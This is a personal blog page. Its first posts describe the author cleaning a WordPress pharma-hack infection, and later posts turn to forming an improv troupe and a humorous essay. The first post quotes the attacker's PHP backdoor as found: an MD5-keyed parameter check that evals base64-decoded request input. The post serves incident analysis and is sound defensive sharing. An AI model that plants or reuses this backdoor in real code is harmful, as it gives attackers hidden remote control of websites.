:::: MENU ::::

Found you, you bastard!

After days of searching, I finally found out how those hackers kept adding and altering files on monkeylaw.org. Tucked away in the bowels of my WordPress installation were some files who
In some of my WordPress subfolders, some PHP files had code added at the top:

<?php /**RbMiTpUrSl*/if((md5($_REQUEST["img_id"]) == "ae6d32585ecc4d33cb8cd68a047d8434") && isset($_REQUEST["mod_content"])) { /**ImOmZtEwJz*/eval(base64_decode($_REQUEST["mod_content"])); /**BjTjFmFxRu*/exit();/**YjWlRqAmIs*/ } ?>

I looked through my HTTP logs and found that, yup, I was getting requests at several of these files with long, encoded mod_content values. I tested one of these and it did indeed make the wp-stat.php file appear and modify .htaccess. So that’s the hack. I think the initial vector was probably TimThumb. I did have an old version of TimThumb, somewhere in some unused theme, but didn’t give it a thought because I didn’t use it. I now know better.

The funny thing is, that wasn’t the only hack on my system. Another involved the forums at stripshow.monkeylaw.org — apparently people were able to upload malicious files there, and I don’t know what those files did. So I will have to remain vigilant and see if anything like that returns.

But for right now, I’m content to crack a beer and sit back for a bit.

Update: OK, looks like no sitting back just yet. Turns out they still have some kind of way in. The files appear to be changing, too. Weird.

More hackage

The hacker problems continue. There was a lull after I changed my shell password, but now it’s started up again big time.

I installed a few filesystem monitors on my sites, which alert me within the hour if anything changes. Hopefully, until I get this resolved, this will at least let me head off the changes before Google gets them. It’s funny; I don’t really even care if Google shows my sites at this point, I just don’t want it showing them as spam.

I contacted my hosting company and they ran some scans which found some malware… looks like the forums on stripshow.monkeylaw.org are one point of entry. I’ve updated that software and will watch that closely. However, that doesn’t seem to be what allowed the hack that is causing the headaches. So I’m still working on it. Changed my shell password again. Uninstalling and reinstalling everything. It’s a good excuse to clean up my filesystem anyway.

Also found a couple more instances of the same kind of hack, including this one, which I’m finding very useful.

Hacker headaches

Yesterday I got one of the most frustrating wake-up calls a website owner can get: My site got hacked. I don’t know when it occurred, exactly, as the form this attack takes is invisible to everyone but Google (and, presumably, similar search engines). It was not directed at any of my active sites, but at Monkey Law, my old webcomic. The attack, which appears to be a variant on the WordPress Pharma Hack, changes the title of the site and fills it up with pharmaceutical spam when searched for. Viewing the site directly in a browser shows none of this.

So I started searching. The process of putting in text that is hidden from users but visible to search engines is called “cloaking,” and I was able to use a cloaking detector to see that my site did indeed present a whole assload of spam to search engines.

I also discovered what the WordPress Pharma Hack is, and got some suggestions for getting rid of it. And indeed, I had had this hack once before. Back then, the hack was accomplished by somehow getting malicious data injected into my MySQL database. In the equivalent of the wp_options table, the “active_plugins” entry was modified to run a file that was hidden somewhere in my filesystem.

That didn’t end up being the cause this time. I scoured my database for hours, and found nothing offensive. Then I started going file by file through WordPress’s base install, and found one file on my system that didn’t exist in a clean one: wp-stat.php.

Sure enough, this file was mainly encoded, and when I searched for the filename, I found that it was mentioned in .htaccess. Someone had gotten to .htaccess. Yikes. Upon examination, I found that the .htaccess hack was indeed sending all search engine traffic to wp-stat.php.

So I removed wp-stat.php, and cleaned out the offending code from .htaccess.

Today it all came back. Indeed, some reports I’ve seen online have complained about hacks like this coming back every day. So I’ll troubleshoot it like I would any other issue: Change one variable at a time and see if the attacks stop. Today it was hardening my .htaccess file using instructions I found at this site. I added the following lines:

<Files ~ "^.*\.([Hh][Tt][Aa])">
order allow,deny
deny from all
satisfy all

We’ll see if this helps.

[Update 2012-07-31 3:49pm]: It didn’t. So now I’ve changed the password of my WordPress admin user (who is not named “admin”) and updated all my plugins.

The Nightmare of Scheduling

How do troupes do this? There are only four people in Goat at the moment, yet it seems impossible to get even this small number together for two hours a week to rehearse.

I put up a new Doodle every week. There usually ends up being maybe two slots we can all get together, if that. After we decide on a time, someone always drops out. I really want to know — how do established troupes, all of whom have members who are as busy as the ones in Goat — do this?

Anyway, we’ve finally got a rehearsal scheduled — with prospective coach Jeremy Lamb, no less. (Yes, I know. Lamb. Goat. It’s meant to be.)

Changing the face of Goat

I have been neglecting to update this blog. Which is OK, since only everything has been happening… Sigh…

Nearly all of the more seasoned veteran improvisers I invited to join the group dropped out, all citing time concerns. The troupe gelled as myself, Indigo, Sabrina, and John.

We hired John Ratliff as a coach. During our first meeting, the idea of improvised Greek tragedy was scrapped. The reason for this was something John pointed out: The Greeks, in tragedy at least, put plot above all else, with character second. Character must come first in an improv show, or you die. Accordingly, the Greeks put character first in comedies. Small wonder that most improv shows are funny.

We’re still doing tragedy, but we’re not taking the Greeks as a model. Fuck the Greeks.

So, with Ratliff, we started working on relationship and character. For the first three or so rehearsals, we did not touch on format at all. No narrative. Ratliff made clear that once it came time to start talking about narrative, he was out. He didn’t feel qualified to coach narrative. Myself, I think he doth protest too much, since he does seem to understand what makes a story interesting. But if he’s not comfortable with it, we need to find a different coach, one who is comfortable with narrative improv.

In the meantime, Michael Ferstenfeld joined up and Sabrina dropped out.

So now we’re starting to scratch the surface of what our format is going to be. I’ve been pushing the idea of using masks for something — it was to have been the chorus when the show was going to be Greek. Perhaps now it can be for narration or something; I just feel masks are very powerful, theatrically, and I’d like to explore their use.

I’ve advertised for a new coach on the Austin Improv forum. I’m a bit surprised; I had expected to get maybe one response at the most. At the time of this writing we’ve had three, all from people who are, somewhat amusingly, in the same troupe. I feel very lucky to have this enormous pool of talent to draw from.

Rehearsals are on pause for the holidays. Order of business come the new year:

  • Get a narrative coach.
  • Find a fifth member — preferably female — to replace Sabrina.
  • Figure out our exact format, including what to do with those fucking masks.

We’ve submitted to the Free Fringe, a new slot the Hideout is trying next year, experimental stuff Thursdays at 10. We’ll see what we get.

Oh, and I’ve refined the logo a bit:

Goat logo

I guess that’s pretty much everything for now. I’ll try to update this blog more frequently.

Birthing a Goat

So, with the demise of my primary improv troupe, Three Hot Chicks, I decided to start a brand new one. All I had was a name: Goat.

The way I understand a troupe usually gets together is this: Two improvisers are talking, and one suggests forming a troupe. The other one agrees, and they start spitballing names of other improvisers they’d like to play with. Eventually enough of these other people have said yes, and a troupe is born.

My approach, then, may have been foolish. Unaware of how it’s usually done (despite this being how it was done with 3HC), I just made a list of people I want to play with. I eventually settled on five people (not counting myself), from varying backgrounds, who probably didn’t know each other. And I invited these people to have an informal get together at a coffee house.

All five people showed up! I was actually kind of flabbergasted. But then came the inevitable question: What are we doing here? And to that, I had, unfortunately, very little in the way of an answer.

I stumbled my way through my very vague vision for the troupe — that it would be called Goat, and do material that was based around the idea of tragedy, through the use of dark humor. Beyond that, I had a rough sketch for a format involving conspiracy theories. Nothing else.

To my relief, people started talking to each other, and to me, about what they’d like to do. My conspiracy idea didn’t seem to set anyone’s imagination afire, but one idea we kept coming back to was the idea of an improvised tragedy… perhaps something inspired by the Greeks.

(As an aside, did you know that of the thousands of tragedies performed in ancient Greece, only works by three writers survive? Those writers are Sophocles, Aeschylus, and Euripides.)

It became apparent pretty quickly who was into the idea. Indigo doodled this:

Doodle of Goat logo

I liked it a lot, so I came up with an Illustrator version:

But of course a troupe needs more than a name and a logo, and what we really need is to play together. So next comes scheduling some sort of rehearsal or play session where we can just have fun. I intend to ask an outside observer to sit in and guide the proceedings, though I haven’t decided who just yet.

This blog will chronicle the development of this troupe. Hopefully there will be a lot more to say on the subject.

Why I had to fire Steve

Employed in my head are many individuals, but there are two in particular that I wish to report on today. We shall refer to them as Bob and Steve.

Bob’s job is to keep me from getting hurt. The physical component of Bob’s job is of relatively minor importance. As I seldom find myself in immediate danger, provided I refrain from engaging belligerent individuals in fisticuffs and remember my inherent clumsiness when in high places, Bob’s primary responsibility is to protect me from emotional harm. Bob is an achiever. He’s decided that the best way to prevent me from getting hurt emotionally is to keep me from becoming emotionally invested in anything. And this strategy is working. Bob’s predecessor slacked off on the job a lot, mistakes were made, and so Bob was hired. Under Bob’s watch, instances of emotional trauma have been severely curtailed.

As for Bob’s methods, they can be described as extreme. Bob’s methodology can be likened to the servant whose job was to walk behind Caesar in triumphal parades, whispering “Sic transit gloria” in his ear. Bob is often seen as a pessimist, but in reality he is merely observing a great deal of fastidiousness in his duties.

Steve, on the other hand, is tasked with a job that should complement Bob’s: his job is to monitor social situations and determine what they mean and how to respond. For example, if an individual is fuming mad at me, it’s Steve’s job to discern this from their facial expression and tone of voice, and recommend giving them space. Likewise, if an individual is making sexual advances toward me, it is Steve’s responsibility to let me know. There is an unwritten understanding that this last task is to be Steve’s number one priority.

Steve’s performance at his job has been, unfortunately, less than satisfactory. There have, of late, been a number of false positives cropping up in Steve’s reports. It falls to Bob to serve as a correction mechanism, a task which he jumps into with aplomb. If a particular girl appears, to Steve, to be attracted to me, Bob is always ready with a reminder that she’s way out of my league, that I’m a fat piece of shit, and should probably just go die. These are but a few of his more colorful assessments.

Usually, I give greater credence to the recommendations of Bob. Although Steve has been on the job longer, my head is a meritocracy and Bob has proven himself correct time and again. However, inexplicably, sometimes I find myself giving more credence to Steve’s rosy-tinged advice than Bob’s. A phenomenally beautiful woman will strike up a conversation, and Steve will submit a report stating that she appears to be totally into me, and recommend proceeding with flirtation. In more extreme cases, he recommends asking the woman out outright.

Bob’s objections are strong. This department cannot concur with this report, advises his amendment to Steve’s report. It is our opinion that you are setting yourself up for extreme humiliation. To be attracted to this subject, given her level of physical beauty, approaches the level of cliché and you have no advantages to distinguish you from the dozens of other men in your community who are doubtlessly pursuing her. The recommendation of this department is to abort any attempt to woo, court, pick up, or proposition subject.

Steve’s followup is peppered with citations. Observe the following phrases used during conversation, he writes, followed by a bulleted list of phrases which, in the right context, could be considered quite flirtatious. He points to the number of times conversation was initiated by the woman in question rather than by me. He points to the frequency of our conversations, and attaches charts comparing this frequency favorably to the frequency of conversations that I have with other friends. With just a hint of umbrage at Bob’s comments, Steve sums up: It is the opinion of this department that subject is totally into you and you should proceed with asking her out.

Bob counters: Basic due diligence on the part of other departments would have revealed that subject has, indeed, a boyfriend. Such departments are advised to engage in more research prior to submitting recommendations.

Steve has more citations. Please note a great deal of apparent obfuscation and redirection when the subject of boyfriends and relationships is subtly broached in conversation. Subject does not explicitly confirm or deny the existence of said boyfriend, but merely implies that at some point in the recent past, she was indeed dating someone. This need not be construed to mean A) that she is seeing anyone at present  (emphasis in original), or B) that any such relationship, if it is currently extant, is considered exclusive. No evidence has yet been presented to support either of these scenarios.

Bob’s next memo is characteristically direct: This interpretation of the available data is reckless and proceeding with recommended course of action presents an extreme hazard. In particular, please be advised against pinning your hopes on the possibility of polyamory.  The best available evidence suggests that less than 1% of the population is engaged in a so-called “open” relationship. Don’t be a schmuck.

I suppose it must be Bob’s attitude that sometimes sways my opinion in Steve’s favor. Bob is relentlessly negative, even abusive. Bob has never cited evidence, never made charts, never offered any proof of his thesis beyond circular tautologies. You always fail because you’re a loser, and you’re a loser because you always fail. As you can imagine, this is not an attractive philosophy. It is natural to gravitate towards a more optimistic picture of events.

However, this approach has led to some very undesirable consequences. In the recent incident from which the above quotations were taken, said boyfriend proved to be very real and very current, casting extreme doubt upon Steve’s powers of data analysis.

Bob’s summary report on the situation is unmerciful. This department directs your attention to our previous memoranda, in which we communicated the likelihood that subject was engaged in a romantic relationship with an individual who was, quite probably, your superior by every conceivable benchmark, and it is with great disappointment that we note that this has turned out to be the case. We point to the level of comfort that subject exhibited when introducing you to him, and the manner with which he conducted himself in your presence. This department wishes to make clear that the only course of action now available is to drink copious amounts of alcohol and listen to the music of Leonard Cohen for several hours at a stretch.

Steve is forced to concur, his memo stating: This office reluctantly agrees that subject’s apparent boyfriend appeared not the least bit threatened by your person, and notes with disappointment that our previous analysis is likely rendered obsolete in view of recent evidence. We have no excuse for what seems to be our misinterpretation of the available data, and are at a loss to explain the apparent disconnect between subject’s behavior towards you and the expected behavior of an individual completely devoid of romantic interest. It is conceivable that, in therms of conventional behavior towards individuals that are considered “just friends” by the feminine gender, subject represents an outlier. This department could have undertaken to gather more data from male individuals with whom she maintains platonic relationships, but was hamstrung by other departments’ insistence that your interest in subject remain a closely-guarded secret.

Bob responds: This department wishes to make clear that it is precisely this injunction that has prevented this situation from becoming a far greater embarrassment than it already is. Had word of other departments’ reckless recommendations become known outside of your person, you would have been held to ridicule for your presumption, and this would have damaged your reputation in your community. This department can cite several examples — some provided by subject herself in the course of conversation, a fact which other departments should have considered — of individuals who have attempted, despite an obvious gulf of physical attractiveness between themselves and subject, to pursue her affections, only to find themselves the subject of unflattering gossip. We submit that additional data would not have improved other departments’ interpretation of facts, as their theses were riddled with problematic fundamental assumptions. In fact, we must question whether such departments are willing to accept the final determination of management in this matter, or if they are even now formulating hypotheses which introduce a layer of doubt into management’s findings.

Steve is forced to admit: It is true that subject has not, explicitly, articulated the notion that said boyfriend is current and exclusive, and indeed the behavior he exhibited with her might well be interpreted as the behavior of an ex who remains a close friend, a circumstance which has been known to factor into subject’s life previously… and that’s the final straw.

Were this an isolated incident, I would be inclined to overlook Steve’s errors in judgment. However, this is merely the latest in what can only be called a pattern of unsatisfactory performance on Steve’s part. The term “incompetence” might not be considered too strong in this case. The fact that even now, he continues to make excuses for his mistakes cannot be looked upon favorably.

Of course, the ultimate decision is and has always been mine, and I must take full responsibility for what is ultimately a failure of management. Nonetheless, this cannot be allowed to continue, and corrective action must be taken.

That’s why, effective immediately, I’ve decided to terminate Steve’s employment and transfer his responsibilities to Bob on an interim basis, until a suitable and hopefully more competent replacement can be found. I ask for my friends and family’s understanding during this transition, during which I expect that I’ll end up being a total bummer to be around. Individuals interested in pursuing romantic liaisons with me are advised to make their intentions unmistakable, such as by introducing their tongues to my throat. We apologize for any inconvenience that this may cause.

I’ve got my own blog!

It’s been a long time coming, but I decided it’s a good idea to start my own blog on my own site, bearing the name Mommy and Daddy gave me. Since bradhawkins.com was already taken, here’s bradhawkins.info!